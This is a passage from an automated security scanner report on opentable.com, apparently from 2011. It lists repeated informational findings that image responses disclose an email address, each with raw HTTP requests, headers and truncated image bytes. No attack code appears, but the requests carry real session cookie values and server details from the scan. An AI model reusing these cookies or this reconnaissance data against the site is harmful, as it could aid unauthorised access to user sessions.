Date: Mon, 03 Oct 2011 12:59:05 GMT

......JFIF.....`.`.....C.
.....
....

...........#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C.
........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......T.N.."..............................
...[SNIP]...
20.175. http://www.opentable.com/img/startpagepromo/Artisanal-Cocktails.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/startpagepromo/Artisanal-Cocktails.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/startpagepromo/Artisanal-Cocktails.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 5475
Content-Type: image/jpeg
Last-Modified: Wed, 01 Sep 2010 18:05:18 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:42 GMT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

.........................................................................................................._....
...[SNIP]...
20.176. http://www.opentable.com/img/startpagepromo/Business-Bites-Lunches.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/startpagepromo/Business-Bites-Lunches.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/startpagepromo/Business-Bites-Lunches.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 3401
Content-Type: image/jpeg
Last-Modified: Wed, 01 Sep 2010 18:19:12 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:59:05 GMT

......JFIF.....d.d......Ducky..............Adobe.d..............................................#%'%#.//33//@@@@@@@@@@@@@@@......................&.....&0#....#0+.'''.+550055@@?@@@@@@@@@@@@......_....
...[SNIP]...
20.177. http://www.opentable.com/img/startpagepromo/Free-Corkage-BYOB.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/startpagepromo/Free-Corkage-BYOB.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/startpagepromo/Free-Corkage-BYOB.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 3833
Content-Type: image/jpeg
Last-Modified: Wed, 01 Sep 2010 18:07:05 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:30 GMT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

.........................................................................................................._....
...[SNIP]...
20.178. http://www.opentable.com/img/startpagepromo/Great-For-Groups.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/startpagepromo/Great-For-Groups.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/startpagepromo/Great-For-Groups.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 3378
Content-Type: image/jpeg
Last-Modified: Thu, 30 Sep 2010 20:54:22 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:42 GMT

......JFIF.....d.d......Ducky..............Adobe.d..............................................#%'%#.//33//@@@@@@@@@@@@@@@......................&.....&0#....#0+.'''.+550055@@?@@@@@@@@@@@@......_....
...[SNIP]...
20.179. http://www.opentable.com/img/startpagepromo/Napa-Valley-Start.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/startpagepromo/Napa-Valley-Start.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/startpagepromo/Napa-Valley-Start.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 3056
Content-Type: image/jpeg
Last-Modified: Thu, 14 Oct 2010 22:57:02 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-04
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:30 GMT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

.........................................................................................................._....
...[SNIP]...
20.180. http://www.opentable.com/img/startpagepromo/Outdoor-Dining.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/startpagepromo/Outdoor-Dining.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/startpagepromo/Outdoor-Dining.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 6570
Content-Type: image/jpeg
Last-Modified: Wed, 01 Sep 2010 18:12:46 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:42 GMT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

.........................................................................................................._....
...[SNIP]...
20.181. http://www.opentable.com/img/startpagepromo/Sunday-Brunch.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/startpagepromo/Sunday-Brunch.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/startpagepromo/Sunday-Brunch.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 6253
Content-Type: image/jpeg
Last-Modified: Wed, 01 Sep 2010 18:12:38 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:41 GMT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

.........................................................................................................._....
...[SNIP]...
20.182. http://www.opentable.com/img/startpagepromo/blue_moon_ot_138x95.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/startpagepromo/blue_moon_ot_138x95.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/startpagepromo/blue_moon_ot_138x95.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 7947
Content-Type: image/jpeg
Last-Modified: Wed, 13 Jul 2011 16:26:33 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:34 GMT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

.........................................................................................................._....
...[SNIP]...
20.183. http://www.opentable.com/img/startpagepromo/img_car_1k.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/startpagepromo/img_car_1k.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/startpagepromo/img_car_1k.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 8144
Content-Type: image/jpeg
Last-Modified: Tue, 28 Sep 2010 03:50:47 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-04
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:34 GMT

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................_....
...[SNIP]...
20.184. http://www.opentable.com/img/startpagepromo/michelinguide_138x95.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/startpagepromo/michelinguide_138x95.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/startpagepromo/michelinguide_138x95.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 5267
Content-Type: image/jpeg
Last-Modified: Wed, 06 Oct 2010 20:49:10 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:41 GMT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

.........................................................................................................._....
...[SNIP]...
20.185. http://www.opentable.com/img/startpagepromo/nationalrw_138x95.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/startpagepromo/nationalrw_138x95.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/startpagepromo/nationalrw_138x95.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 9955
Content-Type: image/jpeg
Last-Modified: Fri, 17 Dec 2010 23:56:47 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-02
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:31 GMT

......JFIF.....d.d......Ducky.......K......Adobe.d...............................................    


   ............................................................................................._....
...[SNIP]...
20.186. http://www.opentable.com/img/startpagepromo/phones_138x95.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/startpagepromo/phones_138x95.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/startpagepromo/phones_138x95.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 6817
Content-Type: image/jpeg
Last-Modified: Tue, 09 Nov 2010 23:05:04 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:34 GMT

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................_....
...[SNIP]...
20.187. http://www.opentable.com/img/startpagepromo/preposttheatre_138x95.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/startpagepromo/preposttheatre_138x95.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/startpagepromo/preposttheatre_138x95.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 15963
Content-Type: image/jpeg
Last-Modified: Tue, 21 Sep 2010 21:32:18 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:42 GMT

......JFIF.....d.d......Ducky.......d......Adobe.d................................................................................................................................................._....
...[SNIP]...
20.188. http://www.opentable.com/img/startpagepromo/promo_DC_sm.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/startpagepromo/promo_DC_sm.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/startpagepromo/promo_DC_sm.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 6377
Content-Type: image/jpeg
Last-Modified: Thu, 30 Sep 2010 18:08:22 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-02
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:41 GMT

......JFIF.....d.d......Ducky.......K......Adobe.d...............................................    


   ............................................................................................._....
...[SNIP]...
20.189. http://www.opentable.com/img/startpagepromo/spotlight_135x95.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/startpagepromo/spotlight_135x95.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/startpagepromo/spotlight_135x95.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 10641
Content-Type: image/jpeg
Last-Modified: Sat, 18 Dec 2010 00:54:58 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:33 GMT

......Exif..II*.................Ducky.......P.....ohttp://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c0
...[SNIP]...
20.190. http://www.opentable.com/img/stg/ResultsProcessingAnimationNew.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/stg/ResultsProcessingAnimationNew.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /img/stg/ResultsProcessingAnimationNew.gif HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 14086
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:09:10 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:53 GMT

GIF89aC.................................................................................................................................................................................................
...[SNIP]...
20.191. http://www.opentable.com/img/stg/progress_text_reg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/stg/progress_text_reg.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /img/stg/progress_text_reg.gif HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1594
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:09:10 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:44 GMT

GIF89a5.4....................wl.ZQ.<6..........33.DD.UU.ff.ww................................................!.......,....5.4.....%.di.h..Ca..A.tm.x..|....p48$.H.l.lZ
..t*5.....
+8.....,#....hn..>2..c
...[SNIP]...
20.192. http://www.opentable.com/img/stg/progressn1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/stg/progressn1.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /img/stg/progressn1.gif HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1013
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:09:10 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:47 GMT

